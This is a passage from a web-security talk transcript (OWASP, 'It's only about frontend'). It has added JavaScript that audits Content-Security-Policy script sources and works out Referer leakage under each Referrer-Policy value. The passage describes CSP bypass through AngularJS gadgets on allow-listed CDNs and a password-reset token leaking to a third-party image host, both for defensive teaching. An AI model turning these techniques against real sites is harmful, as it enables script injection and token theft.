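  if (src.includes('*') || src.some((s) => /^https?:$/.test(s))) {
    findings.push('wildcard or scheme source: any host may serve script');
  }
  for (const s of src) {
    const host = s.replace(/^https?:\/\//, '').replace(/^\*\./, '').replace(/\/.*$/, '');
    if (RISKY_SCRIPT_HOSTS.includes(host)) {
      findings.push(`${s}: whole CDN allowed; an injection can load AngularJS or another gadget from it`);
    }
  }
  return findings;
}

// Reconstruction of the challenge's policy (assumed) and a hardened alternative
// that relies on nonces and 'strict-dynamic' rather than host allow-lists.
const CHALLENGE_POLICY = "default-src 'none'; script-src ajax.googleapis.com";
const HARDENED_POLICY =
  "default-src 'none'; script-src 'nonce-r4nd0m' 'strict-dynamic'; object-src 'none'; base-uri 'none'";

if (typeof require !== 'undefined' && require.main === module) {
  console.log(auditScriptSrc(CHALLENGE_POLICY));
  console.log(auditScriptSrc(HARDENED_POLICY));
}
```

The hardened policy only helps if the nonce is fresh per response and never appears in attacker-readable HTML; with `'strict-dynamic'`, host entries are ignored by browsers that understand it, which is the point.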
![Page 50: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/50.jpg)
Extensions / SmartTV
![Page 51: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/51.jpg)
Extensions / SmartTV
- JS/HTML/CSS
- Interaction with DOM
- XHR queries
- Extended API
![Page 52: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/52.jpg)
For dessert
![Page 53: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/53.jpg)
For dessert
<a href="http://external.com">Go!</a>
The request headers will include
Referer: http://yoursite.com/
What about images, JS and CSS files?
![Page 54: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/54.jpg)
For dessert
http://super-website.com/user/passRecovery?t=SECRET
...
<img src=http://comics.com/password.jpg>
...
The owner of comics.com can see all the secret tokens
https://github.com/cure53/HTTPLeaks
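What Referer a browser sends for a sub-resource under each Referrer-Policy value, added here as an example and not part of the talk, so you can see which policies keep the password-recovery token out of comics.com's logs. The URLs are the slide's; the policy rules follow the Referrer Policy specification, and the helper that lists leaking policies goes beyond the slide by covering all eight values.

```javascript
// Added example (not from the talk): Referer computation per Referrer-Policy value.

const POLICIES = [
  'no-referrer', 'origin', 'unsafe-url', 'same-origin', 'strict-origin',
  'origin-when-cross-origin', 'no-referrer-when-downgrade', 'strict-origin-when-cross-origin',
];

// Returns the Referer value the browser sends, or null for none.
function refererFor(pageUrl, targetUrl, policy = 'strict-origin-when-cross-origin') {
  const page = new URL(pageUrl);
  const target = new URL(targetUrl);
  const full = page.origin + page.pathname + page.search;   // the fragment is never sent
  const origin = page.origin + '/';
  const sameOrigin = page.origin === target.origin;
  const downgrade = page.protocol === 'https:' && target.protocol === 'http:';
  switch (policy) {
    case 'no-referrer': return null;
    case 'origin': return origin;
    case 'unsafe-url': return full;
    case 'same-origin': return sameOrigin ? full : null;
    case 'strict-origin': return downgrade ? null : origin;
    case 'origin-when-cross-origin': return sameOrigin ? full : origin;
    case 'no-referrer-when-downgrade': return downgrade ? null : full;
    case 'strict-origin-when-cross-origin':
      if (sameOrigin) return full;
      return downgrade ? null : origin;
    default: throw new Error('unknown policy: ' + policy);
  }
}

// Which policies hand the secret to the third-party host?
function leakingPolicies(pageUrl, targetUrl, secret) {
  return POLICIES.filter((p) => (refererFor(pageUrl, targetUrl, p) || '').includes(secret));
}

// The slide's page and embedded image.
const RESET_PAGE = 'http://super-website.com/user/passRecovery?t=SECRET';
const IMAGE = 'http://comics.com/password.jpg';

if (typeof require !== 'undefined' && require.main === module) {
  for (const p of POLICIES) console.log(p.padEnd(32), refererFor(RESET_PAGE, IMAGE, p));
  console.log('leaks the token:', leakingPolicies(RESET_PAGE, IMAGE, 'SECRET'));
}
```

Older browsers defaulted to `no-referrer-when-downgrade`, which sends the full URL to an http:// image host; current ones default to `strict-origin-when-cross-origin`. Do not rely on the default: set a `Referrer-Policy` header (or `<meta name="referrer">`) on pages that carry tokens, and better still keep secrets out of URLs altogether.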
![Page 55: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/55.jpg)
Anything else?
Yes:
• X-Frame-Options
• Iframe protection via JS – bypassing (iframe sandboxing / race conditions)
• Switching to HTTPS (HSTS)
• DOM Clobbering (XSS - http://www.slideshare.net/x00mario/in-the-dom-no-one-will-hear-you-scream)
• Cookies (flags, domains – the IE case)
• ...?
![Page 56: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/56.jpg)
Thanks!
Any questions?
@sergeybelove